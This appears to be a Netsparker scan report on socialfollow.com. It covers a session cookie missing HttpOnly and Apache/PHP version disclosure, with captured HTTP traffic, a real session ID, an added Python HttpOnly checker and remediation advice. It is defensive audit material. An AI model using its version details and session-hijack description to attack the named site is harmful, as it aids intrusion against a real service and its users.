Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Sitemap | Social Follow</title><meta name="description" content="" /><meta name="keywords" content="" /><link type="text/css" rel="stylesheet" href="/css/master.css" /><link rel="icon" href="/favicon.ico" type="image/x-icon" /><meta name="google-site-verification" content="FTkZoYL_Hs8WSsg_pBUC6P5KKmUSwTMURtlJWzfL3F8" /><style type="text/css">div.left ul { margin-left: 15px; list-style-type: disc; } div.left ul li { padding-bottom: 5px; }</style><link rel="stylesheet" href="/css/thickbox.css" type="text/css" media="screen" /> <script type="text/javascript" src="/js/jquery.js"></script> <script type="text/javascript" src="/js/thickbox.js"></script></head><body> <div id="header-wrapper"> <div id="header"> <div id="logo"><a href="/" title="Social Follow - All social networks in one button"><img src="/images/transparent.gif" alt="Social Follow - All social networks in one button" width="272" height="70" /></a></div> <div id="login"> <a href="/forgot-password.php" title="Forgot Password" id="aForgotPassword">Forgot your password?</a><br /> <form method="post" name="fTopLogin" action="/login.php"> <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this.value)this.value=''" onblur="if(''==this.value)this.value='Email'" /> <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" /> <input type="submit" value="Login" class="button" /> </form> </div> <div id="nav"> <ul> <li><a href="/" title="Home" class="button selected">Home</a></li> <li><a href="/profiles/" title="Social Follow Profiles" class="button">Profiles</a></li> <li><a href="/blog/" title="Blog" class="button">Blog</a></li> </ul> 
</div> </div> </div> <!-- End: Header --> <div id="page-wrapper"> <div id="page"> <div id="green-border" class="round-top-left"><div class="left"> <h1 class="title">Sitemap</h1> <ul class="sitemaptext"><li><a href="/" title="Home">Home</a></li><li><a href="/blog/" title="Blog">Blog</a></li><li><a href="/profiles/" title="Profiles">Profiles</a></li><li><a href="/login.php" title="Login">Login</a></li><li><a href="/contact-us.php" title="Contact Us">Contact Us</a></li><li><a href="/sitemap.php" title="Sitemap">Sitemap</a></li><li>Blog</li><li style="list-style-type: none;"><ul><li>2009</li><li style="list-style-type: none;"><ul><li><a href="/blog/2009/03/" title="03">03</a></li><li><a href="/blog/2009/04/" title="04">04</a></li><li><a href="/blog/2009/06/" title="06">06</a></li><li>06</li><li style="list-style-type: none;"><ul><li>Page</li><li style="list-style-type: none;"><ul><li><a href="/blog/2009/06/page/2/" title="2">2</a></li></ul></li></ul></li><li><a href="/blog/2009/07/" title="07">07</a></li><li>07</li><li style="list-style-type: none;"><ul><li>Page</li><li style="list-style-type: none;"><ul><li><a href="/blog/2009/07/page/2/" title="2">2</a></li></ul></li></ul></li><li><a href="/blog/2009/08/" title="08">08</a></li></ul></li><li>Categories</li><li style="list-style-type: none;"><ul><li><a href="/blog/c/featured/" title="Featured">Featured</a></li><li><a href="/blog/c/future-features/" title="Future-features">Future-features</a></li><li><a href="/blog/c/new-releases/" title="New-releases">New-releases</a></li><li><a href="/blog/c/social-following/" title="Social-following">Social-following</a></li><li><a href="/blog/c/tweets/" title="Tweets">Tweets</a></li><li>Tweets</li><li style="list-style-type: none;"><ul><li>Page</li><li style="list-style-type: none;"><ul><li><a href="/blog/tag/tweets/page/2/" title="2">2</a></li></ul></li></ul></li></ul></li><li>Featured</li><li style="list-style-type: none;"><ul><li><a 
href="/blog/featured/social-follow-creator-interviewed/" title="Social-follow-creator-interviewed">Social-follow-creator-interviewed</a></li><li><a href="/blog/featured/social-follow-featured-on-blogger-institute/" title="Social-follow-featured-on-blogger-institute">Social-follow-featured-on-blogger-institute</a></li><li><a href="/blog/featured/social-follow-featured-on-fine-art-of-blogging/" title="Social-follow-featured-on-fine-art-of-blogging">Social-follow-featured-on-fine-art-of-blogging</a></li><li><a href="/blog/featured/social-follow-featured-on-go2web20net/" title="Social-follow-featured-on-go2web20net">Social-follow-featured-on-go2web20net</a></li><li><a href="/blog/featured/social-follow-featured-on-killerstartups/" title="Social-follow-featured-on-killerstartups">Social-follow-featured-on-killerstartups</a></li><li><a href="/blog/featured/social-follow-featured-on-ziipa-vote-for-us/" title="Social-follow-featured-on-ziipa-vote-for-us">Social-follow-featured-on-ziipa-vote-for-us</a></li><li><a href="/blog/featured/visionwiz-blogs-about-socialfollowcom/" title="Visionwiz-blogs-about-socialfollowcom">Visionwiz-blogs-about-socialfollowcom</a></li><li><a href="/blog/featured/vote-for-social-follow-on-listio-com/" title="Vote-for-social-follow-on-listio-com">Vote-for-social-follow-on-listio-com</a></li></ul></li><li>Future Features</li><li style="list-style-type: none;"><ul><li><a href="/blog/future-features/social-follow-profile-pages-coming-soon/" title="Social-follow-profile-pages-coming-soon">Social-follow-profile-pages-coming-soon</a></li></ul></li><li>New Releases</li><li style="list-style-type: none;"><ul><li><a href="/blog/new-releases/server-upgrade-for-social-follow/" title="Server-upgrade-for-social-follow">Server-upgrade-for-social-follow</a></li><li><a href="/blog/new-releases/social-follow-almost-launched/" title="Social-follow-almost-launched">Social-follow-almost-launched</a></li><li><a href="/blog/new-releases/social-follow-button-user-flow/" 
title="Social-follow-button-user-flow">Social-follow-button-user-flow</a></li><li><a href="/blog/new-releases/social-follow-expanded/" title="Social-follow-expanded">Social-follow-expanded</a></li><li><a href="/blog/new-releases/social-follow-expands-internationally/" title="Social-follow-expands-internationally">Social-follow-expands-internationally</a></li><li><a href="/blog/new-releases/social-follow-launches/" title="Social-follow-launches">Social-follow-launches</a></li><li><a href="/blog/new-releases/social-follow-profiles-officially-launched/" title="Social-follow-profiles-officially-launched">Social-follow-profiles-officially-launched</a></li><li><a href="/blog/new-releases/social-follow-profiles/" title="Social-follow-profiles">Social-follow-profiles</a></li><li><a href="/blog/new-releases/wordpress-plugin-for-social-follow/" title="Wordpress-plugin-for-social-follow">Wordpress-plugin-for-social-follow</a></li><li>Wordpress Plugin For Social Follow</li><li style="list-style-type: none;"><ul><li><a href="/blog/new-releases/wordpress-plugin-for-social-follow/comment-page-1/" title="Comment-page-1">Comment-page-1</a></li></ul></li></ul></li><li>Page</li><li style="list-style-type: none;"><ul><li><a href="/blog/page/2/" title="2">2</a></li><li><a href="/blog/page/3/" title="3">3</a></li></ul></li><li>Social Following</li><li style="list-style-type: none;"><ul><li><a href="/blog/social-following/definition-of-social-follow/" title="Definition-of-social-follow">Definition-of-social-follow</a></li><li><a href="/blog/social-following/social-follow-joins-twitter/" title="Social-follow-joins-twitter">Social-follow-joins-twitter</a></li></ul></li><li>Tag</li><li style="list-style-type: none;"><ul><li><a href="/blog/tag/analytics/" title="Analytics">Analytics</a></li><li><a href="/blog/tag/blogger-institute/" title="Blogger-institute">Blogger-institute</a></li><li><a href="/blog/tag/definition-of-social-follow/" 
title="Definition-of-social-follow">Definition-of-social-follow</a></li><li><a href="/blog/tag/featured/" title="Featured">Featured</a></li><li><a href="/blog/tag/fine-art-of-blogging/" title="Fine-art-of-blogging">Fine-art-of-blogging</a></li><li><a href="/blog/tag/follow-me-button/" title="Follow-me-button">Follow-me-button</a></li><li><a href="/blog/tag/go2web20net/" title="Go2web20net">Go2web20net</a></li><li><a href="/blog/tag/interview/" title="Interview">Interview</a></li><li><a href="/blog/tag/kerry-jones/" title="Kerry-jones">Kerry-jones</a></li><li><a href="/blog/tag/killerstartupscom/" title="Killerstartupscom">Killerstartupscom</a></li><li><a href="/blog/tag/multiple-languages/" title="Multiple-languages">Multiple-languages</a></li><li><a href="/blog/tag/new-feature/" title="New-feature">New-feature</a></li><li><a href="/blog/tag/new-release/" title="New-release">New-release</a></li><li><a href="/blog/tag/plugin/" title="Plugin">Plugin</a></li><li><a href="/blog/tag/rafferty-pendery/" title="Rafferty-pendery">Rafferty-pendery</a></li><li><a href="/blog/tag/raffy-pendery/" title="Raffy-pendery">Raffy-pendery</a></li><li><a href="/blog/tag/reputation-management/" title="Reputation-management">Reputation-management</a></li><li><a href="/blog/tag/social-follow-button/" title="Social-follow-button">Social-follow-button</a></li><li><a href="/blog/tag/social-follow-featured/" title="Social-follow-featured">Social-follow-featured</a></li><li><a href="/blog/tag/social-follow-new-releases/" title="Social-follow-new-releases">Social-follow-new-releases</a></li><li><a href="/blog/tag/social-follow-profiles/" title="Social-follow-profiles">Social-follow-profiles</a></li><li><a href="/blog/tag/social-follow-user-flow/" title="Social-follow-user-flow">Social-follow-user-flow</a></li><li><a href="/blog/tag/social-follow/" title="Social-follow">Social-follow</a></li><li>Social Follow</li><li style="list-style-type: none;"><ul><li>Page</li><li style="list-style-type: 
none;"><ul><li><a href="/blog/tag/social-follow/page/2/" title="2">2</a></li></ul></li></ul></li><li><a href="/blog/tag/social-following/" title="Social-following">Social-following</a></li><li><a href="/blog/tag/social-networking-profiles/" title="Social-networking-profiles">Social-networking-profiles</a></li><li><a href="/blog/tag/social-networks/" title="Social-networks">Social-networks</a></li><li><a href="/blog/tag/social-profiles/" title="Social-profiles">Social-profiles</a></li><li><a href="/blog/tag/studio98/" title="Studio98">Studio98</a></li><li><a href="/blog/tag/tweets/" title="Tweets">Tweets</a></li><li>Tweets</li><li style="list-style-type: none;"><ul><li>Page</li><li style="list-style-type: none;"><ul><li><a href="/blog/tag/tweets/page/2/" title="2">2</a></li></ul></li></ul></li><li><a href="/blog/tag/twitter-feed/" title="Twitter-feed">Twitter-feed</a></li><li><a href="/blog/tag/twitter/" title="Twitter">Twitter</a></li><li>Twitter</li><li style="list-style-type: none;"><ul><li>Page</li><li style="list-style-type: none;"><ul><li><a href="/blog/tag/twitter/page/2/" title="2">2</a></li></ul></li></ul></li><li><a href="/blog/tag/visionwiz/" title="Visionwiz">Visionwiz</a></li><li><a href="/blog/tag/vote-for-social-follow/" title="Vote-for-social-follow">Vote-for-social-follow</a></li><li><a href="/blog/tag/vote-for-us/" title="Vote-for-us">Vote-for-us</a></li><li><a href="/blog/tag/wordpress/" title="Wordpress">Wordpress</a></li><li><a href="/blog/tag/ziipa/" title="Ziipa">Ziipa</a></li></ul></li><li>Tweets</li><li style="list-style-type: none;"><ul><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-06-28/" title="Twitter-weekly-updates-for-2009-06-28">Twitter-weekly-updates-for-2009-06-28</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-05-6/" title="Twitter-weekly-updates-for-2009-07-05-6">Twitter-weekly-updates-for-2009-07-05-6</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-12-2/" 
title="Twitter-weekly-updates-for-2009-07-12-2">Twitter-weekly-updates-for-2009-07-12-2</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-12-3/" title="Twitter-weekly-updates-for-2009-07-12-3">Twitter-weekly-updates-for-2009-07-12-3</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-12-4/" title="Twitter-weekly-updates-for-2009-07-12-4">Twitter-weekly-updates-for-2009-07-12-4</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-12/" title="Twitter-weekly-updates-for-2009-07-12">Twitter-weekly-updates-for-2009-07-12</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-19-2/" title="Twitter-weekly-updates-for-2009-07-19-2">Twitter-weekly-updates-for-2009-07-19-2</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-19-3/" title="Twitter-weekly-updates-for-2009-07-19-3">Twitter-weekly-updates-for-2009-07-19-3</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-19/" title="Twitter-weekly-updates-for-2009-07-19">Twitter-weekly-updates-for-2009-07-19</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-26-2/" title="Twitter-weekly-updates-for-2009-07-26-2">Twitter-weekly-updates-for-2009-07-26-2</a></li><li><a href="/blog/tweets/twitter-weekly-updates-for-2009-07-26/" title="Twitter-weekly-updates-for-2009-07-26"..
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
The cookie was not marked as HttpOnly. HttpOnly cookies cannot be read by client-side scripts, so marking a cookie as HttpOnly provides an additional layer of protection against Cross-site Scripting attacks.

Impact

During a Cross-site Scripting attack, injected script can read the session cookie (here PHPSESSID) through document.cookie and send it to the attacker, who can then hijack the victim's session.

Actions to Take

  1. See the remedy for the solution.
  2. Consider marking all of the cookies used by the application as HttpOnly (after this change, JavaScript code will not be able to read them).

Remedy

Mark the cookie as HttpOnly. This is an extra layer of defence against XSS, not a fix for it: it stops injected script from reading the cookie value, but the script still runs in the victim's browser and can issue requests that carry the cookie automatically. A tool such as XSS Tunnel uses exactly that to proxy the attacker's requests through the victim's session without ever reading the cookie, so the underlying Cross-site Scripting issues must still be fixed.
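The check behind this finding can be re-run offline against the captured response. The following is an added example, not code from the Netsparker report or from the target site: it parses the Set-Cookie headers of a raw HTTP response and lists every cookie that lacks the HttpOnly flag. The sample response is a constructed copy of the headers captured below, with one hypothetical extra cookie ("remember") that is set correctly so the two cases can be compared.

```python
"""Audit Set-Cookie headers in a raw HTTP response for the HttpOnly flag.

Added example, not part of the Netsparker report. The sample response is a
constructed copy of the headers the scanner captured for GET /, plus one
hypothetical cookie that is set correctly for contrast.
"""

# Constructed sample input: status line and headers from the report's
# GET / response (body abbreviated), plus a hypothetical "remember" cookie.
RAW_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Wed, 20 Apr 2011 01:16:30 GMT\r\n"
    "Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch\r\n"
    "X-Powered-By: PHP/5.2.4-2ubuntu5.12\r\n"
    "Set-Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b; "
    "expires=Wed, 20 Apr 2011 03:16:30 GMT; path=/\r\n"
    "Set-Cookie: remember=0123456789abcdef; Path=/; HttpOnly; Secure\r\n"  # hypothetical
    "Content-Type: text/html\r\n"
    "\r\n"
    "<!DOCTYPE html ...>"
)


def header_pairs(raw):
    """Return (name, value) pairs from the header block of a raw response.

    Names are lower-cased so repeated headers such as Set-Cookie can be
    collected regardless of the case the server used.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    pairs = []
    for line in head.split("\r\n")[1:]:          # [0] is the status line
        name, sep, value = line.partition(":")
        if sep:
            pairs.append((name.strip().lower(), value.strip()))
    return pairs


def parse_set_cookie(value):
    """Split one Set-Cookie value into (cookie_name, attributes).

    Attributes are keyed by lower-cased name; flag attributes such as
    HttpOnly and Secure map to True, valued ones (path, expires) to their
    string. Splitting on ';' is safe here: the comma inside the expires
    date is not a separator.
    """
    parts = [p.strip() for p in value.split(";")]
    name = parts[0].partition("=")[0].strip()
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, sep, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if sep else True
    return name, attrs


def cookies_missing_httponly(raw):
    """Names of every cookie the response sets without the HttpOnly flag.

    This is the check behind the "Cookie Not Marked As HttpOnly" finding:
    a cookie in this list is readable from document.cookie by any script
    injected through an XSS bug.
    """
    missing = []
    for name, value in header_pairs(raw):
        if name == "set-cookie":
            cookie, attrs = parse_set_cookie(value)
            if "httponly" not in attrs:
                missing.append(cookie)
    return missing


if __name__ == "__main__":
    print("cookies without HttpOnly:", cookies_missing_httponly(RAW_RESPONSE))
```

For a PHP 5.2.4 application such as this one, the session cookie is fixed by setting session.cookie_httponly = On in php.ini (or ini_set('session.cookie_httponly', 1) before session_start()); cookies set by hand take the httponly argument of setcookie(), available since PHP 5.2.0. Re-running the check on the new response should return an empty list.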

External References

- /

/ CONFIRMED

http://www.socialfollow.com/

Identified Cookie

PHPSESSID

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:16:30 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Set-Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b; expires=Wed, 20 Apr 2011 03:16:30 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7330
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Social Follow | Create a Follow Me Button | All social networks in one button</title><meta name="description" content="" /><meta name="keywords" content="" /><link type="text/css" rel="stylesheet" href="/css/master.css" /><link rel="icon" href="/favicon.ico" type="image/x-icon" /><meta name="google-site-verification" content="FTkZoYL_Hs8WSsg_pBUC6P5KKmUSwTMURtlJWzfL3F8" /><link type="text/css" rel="stylesheet" href="/css/home.css" /><script type="text/javascript" src="/js/flash-detect.js"></script><script type="text/javascript" language="javascript" src="js/validator.js"></script><link rel="stylesheet" href="/css/thickbox.css" type="text/css" media="screen" /> <script type="text/javascript" src="/js/jquery.js"></script> <script type="text/javascript" src="/js/thickbox.js"></script></head><body> <div id="header-wrapper"> <div id="header"> <div id="logo"><a href="/" title="Social Follow - All social networks in one button"><img src="/images/transparent.gif" alt="Social Follow - All social networks in one button" width="272" height="70" /></a></div> <div id="login"> <a href="/forgot-password.php" title="Forgot Password" id="aForgotPassword">Forgot your password?</a><br /> <form method="post" name="fTopLogin" action="/login.php"> <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this.value)this.value=''" onblur="if(''==this.value)this.value='Email'" /> <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" /> <input type="submit" value="Login" class="button" /> </form> </div> <div id="nav"> <ul> <li><a href="/" title="Home" class="button selected">Home</a></li> <li><a 
href="/profiles/" title="Social Follow Profiles" class="button">Profiles</a></li> <li><a href="/blog/" title="Blog" class="button">Blog</a></li> </ul> </div> </div> </div> <!-- End: Header --> <div id="page-wrapper"> <div id="page" style="padding-top:0"> <br /><div id="flashcontent" style="width:904; height:250px;"> <h2>Oops!</h2> <p>It looks like you don't have flash player installed. You might want to get that if you plan to use the Flash gallery. <a href="http://www.macromedia.com/go/getflashplayer" >Click here</a> to go to Macromedia download page.</p></div><script type="text/javascript"> var so = new SWFObject("/flash/home.swf", "gallery", "904", "250", "0", "#A5C62F"); so.write("flashcontent");</script><div class="left" style="width:850px"> <div style="float:left; width:330px;text-align:center;"> <h1 style="font-size:26px;"><span class="orange">Try</span> Our Sample Button</h1> <p align="center" style="padding: 0; margin:0;font-size:14px; color:#A9B104;">(mouse over button)</p> <div align="center" style="margin-top: 10px;"> <!-- Start SocialFollow.com Button Code --> <img src="http://www.socialfollow.com/button/image/?b=1" class="socialFollowImage" alt="Follow Me!" 
/> <script type="text/javascript" src="http://www.socialfollow.com/button/?b=1"></script> <script type="text/javascript">socialfollow.init("socialFollowImage");</script> <!-- End SocialFollow.com Button Code --> </div> </div> <div style="float:right; width:400px; text-align:left;"> <h1 style="font-size:29px;">Sign Up <span class="orange">Now!</span> <span style="font-size:23px;">(It's Free)</span></h1> <form method="post" name="fRegister" action="/register.php"> <table> <tr> <td valign="top" width="135"><label for="tName">Your Name:</label></td> <td><input name="tName" type="text" id="tName" value="" class="textBoxSize" maxlength="75" /></td> </tr> <tr> <td valign="top"><label for="tEmail">Email:</label></td> <td><input name="tEmail" id="tEmail" type="text" value="" class="textBoxSize" maxlength="100" /></td> </tr> <tr> <td valign="top"><label for="tPassword">Password:</label></td> <td><input name="tPassword" id="tPassword" type="password" value="" class="textBoxSize" maxlength="32" /></td> </tr> <tr> <td valign="top"><label for="tRePassword">Password (retype):</label></td> <td><input name="tRePassword" type="password" id="tRePassword" class="textBoxSize" maxlength="32" /></td> </tr> <tr> <td></td> <td><input type="checkbox" name="cbNewsletter" id="cbNewsletter" class="cb" value="1" checked="checked" /> <label for="cbNewsletter">Subscribe to Social Follow's Newsletter</label></td> </tr> <tr> <td></td> <td><input type="checkbox" name="cbTerms" id="cbTerms" class="cb" value="agree" style="margin-bottom: 10px; float: left; margin-right: 4px;" /> <label for="cbTerms">Yes, I agree to the <a href="/terms-and-conditions.php" target="_blank" title="Terms and Conditions" class="none">terms and conditions</a> and <a href="/privacy-policy.php" title="Privacy Policy" target="_blank" class="none">privacy policy</a>.</label></td> </tr> <tr><td colspan="2">&nbsp;</td></tr> <tr> <td valign="top">&nbsp;</td> <td align="right"><input name="submit" type="image" 
src="/images/btn_sign-up.gif" alt="Sign-up!" /></td> </tr> </table> </form> <script type="text/javascript" language="javascript">var fv=new Validator("fRegister");fv.addValidation("tName","req", "The \"Your Name\" field is required");fv.addValidation("tEmail","req", "The \"Email\" field is required");fv.addValidation("tEmail","email", "The \"Email\" field must contain a valid email address");fv.addValidation("tPassword","req", "The \"Password\" field is required");fv.addValidation("tPassword","minlen=4", "The \"Password\" field must have at least 4 characters");fv.addValidation("tPassword|tRePassword","match", "The Password fields must match");fv.addValidation("cbTerms","req", "You must agree to the terms of service and privacy policy");</script> </div></div><div class="right"> </div><br clear="all" /><br /><br /><br /></div></div><div id="footer"> <a href="/" title="Home">Home</a> | <a href="/profiles/" title="Profiles">Profiles</a> | <a href="/blog/" title="Blog">Blog</a> | <a href="/terms-and-conditions.php" title="Terms and Conditions">Terms</a> | <a href="/privacy-policy.php" title="Privacy Policy">Privacy</a> | <a href="/contact-us.php" title="Contact">Contact</a> | <a href="/sitemap.php" title="Sitemap">Sitemap</a> <p id="copyright">&copy; Copyright 2011 SocialFollow.com | Social Follow is owned and managed by <a href="http://www.studio98.com/" title="Studio98" target="_blank">Studio98</a></p></div><!-- End: Footer --><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1794977-15");pageTracker._trackPageview();} catch(err) {}</script></body></html>
Apache Version Disclosure

Apache Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the Server header of the HTTP response, which carries the exact Apache version and the operating system, and also lists the PHP, mod_ssl, OpenSSL, mod_perl and Perl versions in use. This information helps an attacker understand the systems in use and develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the Server header, and for each of the other products and versions the same header lists.

Remedy

Configure your web server to prevent information leakage from the Server header of its HTTP response. On Apache, ServerTokens Prod reduces the header to "Apache" with no version, operating system or module strings, and ServerSignature Off removes the same version line from server-generated error pages and directory listings.
- /sitemap.xml

/sitemap.xml

http://www.socialfollow.com/sitemap.xml

Extracted Version

2.2.8 (Ubuntu)

Request

GET /sitemap.xml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:16:30 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Fri, 18 Jun 2010 23:42:18 GMT
ETag: "19abdf-e460-4895681664a80"
Accept-Ranges: bytes
Content-Length: 58464
Keep-Alive: timeout=2, max=97
Connection: Keep-Alive
Content-Type: application/xml


<?xml version="1.0" encoding="UTF-8"?>
<urlset
xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9
http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd">
<!-- created with Free Online Sitemap Generator www.xml-sitemaps.com -->

<url>
<loc>http://www.socialfollow.com/</loc>
<changefreq>monthly</changefreq>
<priority>1.00</priority>
</url>
<url>
<loc>http://www.socialfollow.com/forgot-password.php</loc>
<changefreq>monthly</changefreq>
<priority>0.50</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/</loc>
<changefreq>monthly</changefreq>
<priority>0.90</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/</loc>
<changefreq>monthly</changefreq>
<priority>0.90</priority>
</url>
<url>
<loc>http://www.socialfollow.com/terms-and-conditions.php</loc>
<changefreq>monthly</changefreq>
<priority>0.20</priority>
</url>
<url>
<loc>http://www.socialfollow.com/privacy-policy.php</loc>
<changefreq>monthly</changefreq>
<priority>0.20</priority>
</url>
<url>
<loc>http://www.socialfollow.com/contact-us.php</loc>
<changefreq>monthly</changefreq>
<priority>0.80</priority>
</url>
<url>
<loc>http://www.socialfollow.com/sitemap.php</loc>
<changefreq>monthly</changefreq>
<priority>0.80</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/movingpartsaudio/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/frozenrodeo/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/theannandalecardinals/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/heartofthelakesrecords/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/a-special-touch/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/a-vintage-revolution/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/aarontimlin/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/abhi/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/abhishek/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/academy-of-life-and-leadership/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/achraf52/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/acquaspa/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/adam-haider/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/profiles/adamlinsley/</loc>
<changefreq>monthly</changefreq>
<priority>0.51</priority>
</url>
<url>
<loc>http://www.socialfollow.com/login.php</loc>
<changefreq>monthly</changefreq>
<priority>0.85</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/wordpress-plugin-for-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/kerry-jones/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/new-feature/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/plugin/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/wordpress/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/c/new-releases/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/new-releases/server-upgrade-for-social-follow/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/new-release/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tweets/twitter-weekly-updates-for-2009-07-26-2/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
<loc>http://www.socialfollow.com/blog/tag/tweets/</loc>
<changefreq>monthly</changefreq>
<priority>0.64</priority>
</url>
<url>
